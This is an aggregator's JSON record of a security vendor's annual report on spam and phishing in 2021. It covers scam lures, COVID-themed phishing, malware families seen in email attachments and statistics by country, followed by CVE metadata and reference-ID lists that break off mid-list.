DATABASE RESOURCES PRICING ABOUT US

{"id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "vendorId": null, "type": "securelist", "bulletinFamily": "blog", "title": "Spam and phishing in 2021", "description": "\n\n## Figures of the year\n\nIn 2021:\n\n * 45.56% of e-mails were spam\n * 24.77% of spam was sent from Russia with another 14.12% from Germany\n * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails\n * The most common malware family found in attachments were Agensla Trojans\n * Our Anti-Phishing system blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their &quot;investment projects&quot; look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That&#x27;s how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they&#x27;d invite the &quot;customer&quot; to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn&#x27;t think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be &quot;processed&quot;.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events &quot;streamed&quot; on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim&#x27;s trust. They used official advertisements and provided a synopsis of the film on the website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, &quot;prize winners&quot; are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small &quot;commission fee&quot; to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient&#x27;s attention. The attackers&#x27; main objective was to trick the victim into following the link to a phishing page for entering login details. That&#x27;s why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of &quot;email Portal&quot; or another similar resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient&#x27;s guard and prompt them to enter the username and password for their corporate account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim&#x27;s bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)\n\nThe sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There&#x27;s no guarantee that the code they&#x27;re selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)\n\n#### The corporate sector\n\nCOVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to &quot;confirm&quot; their e-mail address by logging in to their account on the scam website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)\n\nAnother malicious mailshot utilized e-mails with an attached HTML file called &quot;Covid Test Result&quot;. Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)\n\nThe &quot;important message about vaccination&quot; which supposedly lay unread in a recipient&#x27;s inbox also contained a link to a page belonging to attackers requesting corporate account details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)\n\nAnother type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a &quot;2 months salary receipt&quot; were intended to make the recipient open the attachment with the malicious object as quickly as possible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)\n\n#### COVID-19 vaccination\n\nWhile authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people&#x27;s desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country&#x27;s National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)\n\nIn both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users&#x27; personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a &quot;prize&quot; page but told to pay a small necessary &quot;commission fee&quot; in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim&#x27;s system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nLike in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who&#x27;ve also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China&#x27;s rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as 2020, Japan (2,36%) and Poland (1.66%). In total, over three quarters of the world&#x27;s spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which create malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor called [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in the ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%) whose share was just 0.01 p.p higher than Germany&#x27;s. They&#x27;re followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It&#x27;s worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in forth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nMost of the phishing websites blocked in 2021 used a .com domain name like in 2020, whose share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they&#x27;re attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We have observed a spike in phishing activity on WhatsApp in July, when the Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can&#x27;t say for sure that there&#x27;s a connection between Whatreg activity and phishing in this messaging app, but it&#x27;s a possibility. We also observed another brief surge in phishing activity on the week from October 31 through to November 6, 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes \u2014 remaining two of the year&#x27;s main themes \u2014 were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. Fresh &quot;investment projects&quot; will replace their forerunners. &quot;Prize draws&quot; will alternate with holiday giveaways when there&#x27;s a special occasion to celebrate. Attacks on the corporate sector aren&#x27;t going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we&#x27;ll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "published": "2022-02-09T10:00:28", "modified": "2022-02-09T10:00:28", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", "reporter": "Tatyana Kulikova, Tatyana Shcherbakova", "references": [], "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "immutableFields": [], "lastseen": "2022-02-14T15:27:23", "viewCount": 1434, "enchantments": {"backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0018"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2018-0802"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618", "KB4011643"]}, {"type": "mssecure", "idList": ["MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201892253"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JAN_OFFICE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:97274435F9F49556ED060635FD9081E2"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46"]}, {"type": "thn", "idList": ["THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1009", "CPAI-2018-0018"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2017-11884", "CVE-2018-0802"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD"]}, {"type": "hivepro", "idList": ["HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:775442060A0795887FAB657C06773723"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011276", "KB4011574", "KB4011580", "KB4011604", "KB4011607", "KB4011610", "KB4011618", "KB4011643", "KB4011656", "KB4011659"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE_COMPATIBILITY.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812730", "OPENVAS:1361412562310812731"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "securelist", 